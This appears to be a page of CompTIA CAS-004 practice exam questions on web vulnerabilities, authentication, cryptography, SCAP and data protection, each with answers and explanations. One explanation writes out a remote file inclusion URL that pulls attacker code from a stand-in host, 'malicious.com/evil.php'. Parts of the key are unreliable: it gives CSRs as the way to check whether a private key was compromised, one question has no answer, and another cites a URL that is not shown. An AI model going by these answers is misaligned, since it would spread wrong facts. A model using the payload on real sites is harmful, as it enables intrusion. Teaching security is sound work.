Practice Free CAS-004 Exam Online Questions
A security engineer notices the company website allows users following example:
hitps://mycompany.com/main.php?Country=US
Which of the following vulnerabilities would MOST likely affect this site?
- A . SQL injection
- B . Remote file inclusion
- C . Directory traversal –
- D . Unsecure references
B
Explanation:
Remote file inclusion (RFI) is a web vulnerability that allows an attacker to include malicious external files that are later run by the website or web application12. This can lead to code execution, data theft, defacement, or other malicious actions. RFI typically occurs when a web application dynamically references external scripts using user-supplied input without proper validation or sanitization23.
In this case, the website allows users to specify a country parameter in the URL that is used to include a file from another domain. For example, an attacker could craft a URL like this: https://mycompany.com/main.php?Country=https://malicious.com/evil.php
This would cause the website to include and execute the evil.php file from the malicious domain, which could contain any arbitrary code3.
A cybersecurity analyst discovered a private key that could have been exposed.
Which of the following is the BEST way for the analyst to determine if the key has been compromised?
- A . HSTS
- B . CRL
- C . CSRs
- D . OCSP
C
Explanation:
Reference: https://www.ssl.com/faqs/compromised-private-keys/
A security engineer needs to implement a cost-effective authentication scheme for a new web-based application that requires:
• Rapid authentication
• Flexible authorization
• Ease of deployment
• Low cost but high functionality
Which of the following approaches best meets these objectives?
- A . Kerberos
- B . EAP
- C . SAML
- D . OAuth
- E . TACACS+
D
Explanation:
OAuth, which stands for Open Authorization, is a standard for authorization that enables secure token-based access. It allows users to grant a web application access to their information on another web application without giving them the credentials for their account. OAuth is particularly useful for rapid authentication, flexible authorization, ease of deployment, and offers high functionality at a low cost, making it an ideal choice for new web-based applications. This approach is well-suited for situations where web applications need to interact with each other on behalf of the user, without sharing user’s password, such as integrating a geolocation application with Facebook. OAuth uses tokens issued by an authorization server, providing restricted access to a user’s data, which aligns with the objectives of rapid authentication, flexible authorization, ease of deployment, and cost-effectiveness.
A recent audit discovered that multiple employees had been using their badges to walk through the secured data center to get to the employee break room. Most of the employees were given access during a previous project, but the access was not removed in a timely manner when the project was complete.
Which of the following would reduce the likelihood of this scenario occurring again?
- A . Create an automated quarterly attestation process that requires management approval for data center access and removes unapproved access.
- B . Require all employees to sign an AUP that prohibits accessing the data center without an active service ticket number.
- C . Remove all access to the data center badge readers and only re-add employees with a valid business purpose for entering the floor.
- D . Implement time-of-day restrictions on the data center badge readers and create automated alerts for unapproved swipe attempts.
A
Explanation:
Implementing an automated quarterly attestation process ensures that access is reviewed and approved regularly. This prevents unauthorized or unnecessary access from persisting over time, aligning with CASP+ objective 1.6, which emphasizes continuous access control monitoring.
Which of the following allows computation and analysis of data within a ciphertext without knowledge of the plaintext?
- A . Lattice-based cryptography
- B . Quantum computing
- C . Asymmetric cryptography
- D . Homomorphic encryption
D
Explanation:
Reference: https://searchsecurity.techtarget.com/definition/cryptanalysis
Homomorphic encryption is a type of encryption that allows computation and analysis of data within a ciphertext without knowledge of the plaintext. This means that encrypted data can be processed without being decrypted first, which enhances the security and privacy of the data. Homomorphic encryption can enable applications such as secure cloud computing, machine learning, and data analytics.
Reference:
https://www.ibm.com/security/homomorphic-encryption
https://www.synopsys.com/blogs/software-security/homomorphic-encryption/
The CI/CD pipeline requires code to have close to zero defects and zero vulnerabilities. The current process for any code releases into production uses two-week Agile sprints.
Which of the following would BEST meet the requirement?
- A . An open-source automation server
- B . A static code analyzer
- C . Trusted open-source libraries
- D . A single code repository for all developers
B
Explanation:
A static code analyzer is a tool that analyzes computer software without actually running the software. A static code analyzer can help developers find and fix vulnerabilities, bugs, and security risks in their new applications while the source code is in its ‘static’ state. A static code analyzer can help ensure that the code has close to zero defects and zero vulnerabilities by checking the code against a set of coding rules, standards, and best practices. A static code analyzer can also help improve the code quality, performance, and maintainability.
An organization wants to perform a scan of all its systems against best practice security configurations.
Which of the following SCAP standards, when combined, will enable the organization to view each of the configuration checks in a machine-readable checklist format for fill automation? (Choose two.)
- A . ARF
- B . XCCDF
- C . CPE
- D . CVE
- E . CVSS
- F . OVAL
B,F
Explanation:
Reference: https://www.govinfo.gov/content/pkg/GOVPUB-C13-9ecd8eae582935c93d7f410e955dabb6/pdf/GOVPUB-C13-9ecd8eae582935c93d7f410e955dabb6.pdf (p.12)
XCCDF (Extensible Configuration Checklist Description Format) and OVAL (Open Vulnerability and Assessment Language) are two SCAP (Security Content Automation Protocol) standards that can enable the organization to view each of the configuration checks in a machine-readable checklist format for full automation. XCCDF is a standard for expressing security checklists and benchmarks, while OVAL is a standard for expressing system configuration information and vulnerabilities. ARF (Asset Reporting Format) is a standard for expressing the transport format of information about assets, not configuration checks. CPE (Common Platform Enumeration) is a standard for identifying and naming hardware, software, and operating systems, not configuration checks. CVE (Common Vulnerabilities and Exposures) is a standard for identifying and naming publicly known cybersecurity vulnerabilities, not configuration checks. CVSS (Common Vulnerability Scoring System) is a standard for assessing the severity of cybersecurity vulnerabilities, not configuration checks.
Verified Reference:
https://www.comptia.org/blog/what-is-scap
https://partners.comptia.org/docs/default-source/resources/casp-content-guide
A company would like to move its payment card data to a cloud provider.
Which of the following solutions will best protect account numbers from unauthorized disclosure?
- A . Storing the data in an encoded file
- B . Implementing database encryption at rest
- C . Only storing tokenized card data
- D . Implementing data field masking
C
Explanation:
Tokenization is the best solution to protect payment card data from unauthorized disclosure when moving to the cloud. Tokenization replaces sensitive card data with unique identifiers (tokens) that have no exploitable value outside the tokenization system. Even if the data is compromised, the attacker would not obtain actual card numbers. This is in line with PCI DSS requirements for protecting payment card information. Other solutions like encryption at rest or field masking help, but tokenization provides the strongest protection by ensuring that card data is not stored at all.
Reference: CASP+ CAS-004 Exam Objectives: Domain 1.0 C Risk Management (Tokenization and PCI DSS Compliance)
CompTIA CASP+ Study Guide: Data Protection Techniques (Tokenization)
An organization decided to begin issuing corporate mobile device users microSD HSMs that must be installed in the mobile devices in order to access corporate resources remotely.
Which of the following features of these devices MOST likely led to this decision? (Select TWO.)
- A . Software-backed keystore
- B . Embedded cryptoprocessor
- C . Hardware-backed public key storage
- D . Support for stream ciphers
- E . Decentralized key management
- F . TPM 2.0 attestation services
A threat analyst notices the following URL while going through the HTTP logs.
Which of the following attack types is the threat analyst seeing?
- A . SQL injection
- B . CSRF
- C . Session hijacking
- D . XSS
D
Explanation:
XSS stands for cross-site scripting, which is a type of attack that injects malicious code into a web page that is then executed by the browser of a victim. The URL in the question contains a script tag that tries to execute a JavaScript code from an external source, which is a sign of XSS.
Verified Reference:
https://www.comptia.org/training/books/casp-cas-004-study-guide, https://owasp.org/www-community/attacks/xss/